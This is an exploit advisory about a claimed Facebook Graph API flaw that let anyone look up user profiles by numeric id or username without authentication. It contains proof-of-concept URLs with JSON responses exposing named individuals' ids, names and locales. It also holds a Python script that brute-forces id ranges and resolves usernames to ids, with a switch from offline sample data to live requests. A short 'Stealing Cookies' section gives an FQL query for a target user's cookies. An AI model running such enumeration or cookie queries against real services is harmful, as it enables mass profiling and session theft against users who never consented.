# Exploit Title :
Facebook HTTP Graph API Users ID (and others..) Information Disclosure -OAuthException- and Vulnerable (http) to Brute Force Attack
# *Vendor*: Facebook.com http://graph.facebook.com
# Author: Juan Carlos Garcia (@secnight)(nightsec) ;)
# Blog: http://hackingmadrid.blogspot.com
http://blog.0verl0ad.com/
http://highsec.es
BRIEF DESCRIPTION
******************
The Graph API is the primary way that data is retrieved from or posted to Facebook. The Getting Started Guide contains an overview of the basics of the API, walks you through using the Graph API Explorer, shows you how names work, how permissions work and what connections are, and puts it all together so the rest of this reference makes sense.
Users Information Disclosure
**********************
Anyone can retrieve basic profile data for ANY user, because the Graph API exposes that data to developers and these lookups require no authentication at all.
This "excess" of functionality means user data is exposed to any malicious attacker without any need for it, and lets the attacker compile information (information gathering) about a target.
As the proof of concept shows, a user can be identified from their numeric id (and the id from the username); because the endpoint is unauthenticated, the ids can simply be brute forced, and because it is served over plain HTTP every lookup is also readable by anyone on the path.
Proof Of Concept (PoC)
First
***
http://graph.facebook.com/
As you can see, requesting the bare endpoint gives a "GraphMethodException":
{
"error": {
"message": "Unsupported get request",
"type": "GraphMethodException",
"code": 100
}
}
Creating an OAuthException
**********************
http://graph.facebook.com/00000000000000000000000000000000000000000000
{
"error": {
"message": "(#803) Some of the aliases you requested do not exist: 00000000000000000000000000000000000",
"type": "OAuthException",
"code": 803
}
}
My Profile ¡!! ;)
http://graph.facebook.com/ADMIN.CANGREJOS
{
"id": "100001678510102",
"name": "Juan Carlos Garcia",
"first_name": "Juan Carlos",
"last_name": "Garcia",
"username": "ADMIN.CANGREJOS",
"gender": "male",
"locale": "es_ES"
}
And we can also do the REVERSE, because we now have the id:
http://graph.facebook.com/100001678510102
Mark Zuckerberg, CEO of Facebook
http://graph.facebook.com/zuck
{
"id": "4",
"name": "Mark Zuckerberg",
"first_name": "Mark",
"last_name": "Zuckerberg",
"link": "https://www.facebook.com/zuck",
"username": "zuck",
"gender": "male",
"locale": "en_US"
}
--> WTF???? ... The number 4. Who are ids 1, 2 and 3?
The Reverse
http://graph.facebook.com/4
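The lookups above (username to id, id back to username, and walking a range of numeric ids) are easy to automate. The following script is an added example written for this page; it is not the advisory author's code nor anything from Facebook. It assumes HTTPS rather than the plain-http URLs shown above, the function names (fetch_graph, classify, enumerate_nodes, round_trip) are its own, and the sample responses it ships with are constructed from the JSON fragments quoted on this page so that it runs offline; fake_fetch is the offline stand-in for the live fetcher. Note that unauthenticated /{id} lookups have since been closed off by Facebook and now answer with an OAuthException asking for an access token, so a live run today will classify everything as 'error'.

```python
"""Added example: enumerate and classify Facebook Graph API profile lookups.

Not part of the original advisory. Function names and the HTTPS base URL are
assumptions of this example; sample responses below are constructed from the
fragments quoted in the advisory so the script runs without network access.
"""
import json
import time
import urllib.error
import urllib.parse
import urllib.request
from typing import Callable, Dict, Iterable, Optional

# Assumption: HTTPS instead of the plain-http URLs in the advisory, so the
# lookups themselves are not readable by anyone on the path.
GRAPH_BASE = "https://graph.facebook.com/"

Result = Dict[str, Optional[str]]


def fetch_graph(node: str) -> str:
    """Fetch the raw JSON body for one Graph API node (numeric id or username).

    Facebook returns its JSON error objects with a 4xx status, so the body of
    an HTTPError is returned as well instead of being raised.
    """
    url = GRAPH_BASE + urllib.parse.quote(node, safe="")
    try:
        with urllib.request.urlopen(url, timeout=10) as resp:
            return resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as err:
        return err.read().decode("utf-8", "replace")


def classify(body: str) -> Result:
    """Map one response body to {'status', 'id', 'username'}.

    status: 'profile'  - a user object came back (the disclosure case)
            'missing'  - OAuthException #803, the alias/id does not exist
            'error'    - any other Graph error (GraphMethodException, ...)
            'garbage'  - body was not a JSON object at all
    """
    try:
        data = json.loads(body)
    except json.JSONDecodeError:
        data = None
    if not isinstance(data, dict):
        return {"status": "garbage", "id": None, "username": None}
    err = data.get("error")
    if isinstance(err, dict):
        missing = err.get("type") == "OAuthException" and err.get("code") == 803
        return {"status": "missing" if missing else "error", "id": None, "username": None}
    return {"status": "profile", "id": data.get("id"), "username": data.get("username")}


def enumerate_nodes(nodes: Iterable[str],
                    fetch: Callable[[str], str] = fetch_graph,
                    delay: float = 0.0) -> Dict[str, Result]:
    """Look up every id/username in `nodes`; return only those that resolved to a profile.

    `delay` seconds between requests keeps a live run from tripping rate limits.
    """
    found: Dict[str, Result] = {}
    for node in nodes:
        result = classify(fetch(node))
        if result["status"] == "profile":
            found[node] = result
        if delay:
            time.sleep(delay)
    return found


def round_trip(node: str, fetch: Callable[[str], str] = fetch_graph) -> bool:
    """Resolve username -> numeric id -> username, the 'reverse' lookup from the
    advisory (zuck <-> 4, ADMIN.CANGREJOS <-> 100001678510102)."""
    first = classify(fetch(node))
    if first["status"] != "profile" or not first["id"]:
        return False
    second = classify(fetch(first["id"]))
    return second["status"] == "profile" and second["username"] == first["username"]


# Constructed sample responses, built from the fragments quoted in the advisory,
# so the example runs offline. Replace fake_fetch with fetch_graph to go live.
_ZUCK = '{"id": "4", "name": "Mark Zuckerberg", "username": "zuck", "locale": "en_US"}'
_JCG = ('{"id": "100001678510102", "name": "Juan Carlos Garcia", '
        '"username": "ADMIN.CANGREJOS", "locale": "es_ES"}')
NOT_FOUND_RESPONSE = ('{"error": {"message": "(#803) Some of the aliases you requested '
                      'do not exist: x", "type": "OAuthException", "code": 803}}')
SAMPLE_RESPONSES = {
    "zuck": _ZUCK, "4": _ZUCK,
    "ADMIN.CANGREJOS": _JCG, "100001678510102": _JCG,
    "": ('{"error": {"message": "Unsupported get request", '
         '"type": "GraphMethodException", "code": 100}}'),
}


def fake_fetch(node: str) -> str:
    """Offline stand-in for fetch_graph, serving the constructed responses."""
    return SAMPLE_RESPONSES.get(node, NOT_FOUND_RESPONSE)


if __name__ == "__main__":
    # Brute force a small numeric id range; id 4 is the only hit in the sample data.
    for node, info in enumerate_nodes((str(i) for i in range(1, 6)), fetch=fake_fetch).items():
        print(node, "->", info["username"])
```

Distinguishing the #803 "alias does not exist" answer from other errors is what makes the id walk useful: a 'missing' result means the id is free, an 'error' result means the request itself is being refused (method error, rate limit, or a token requirement) and the scan should stop rather than mark the id as empty.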
COOKIES
The FQL (Facebook Query Language) "cookies" table lists the cookies that were set for the user, as represented in FQL.
Columns
Name       Type
expires    timestamp
name       string
path       string
uid        numeric string
value      string
To access this table you only need a valid access token with basic permissions.
Facebook Login makes it easy to connect with users on your app or website. You can use several methods in the JavaScript or mobile SDKs to speed up the registration process and build a functional system in minutes.
Stealing Cookies
You only need the following FQL query to extract the cookies for a given uid A (issued with a valid access token, as noted above; without a token the Graph API answers with an error rather than rows):
SELECT ... FROM cookies WHERE uid = A
Note: Additional filters on other columns can be specified, but they may make the query less efficient.
/Admin
http://graph.facebook.com/admin/
{
"id": "100005597474065",
"name": "AD Min",
"first_name": "AD",
"last_name": "Min",
"link": "https://www.facebook.com/ad.min",
"username": "ad.min",
"gender": "male",
"locale": "ru_RU"
}
Procedure: open the links given above and you can play .. No hack, no fun ;)
Special THANKS : Eduardo Arriols Nuñez .. very good newbie ;)
Live Free or Die Hacking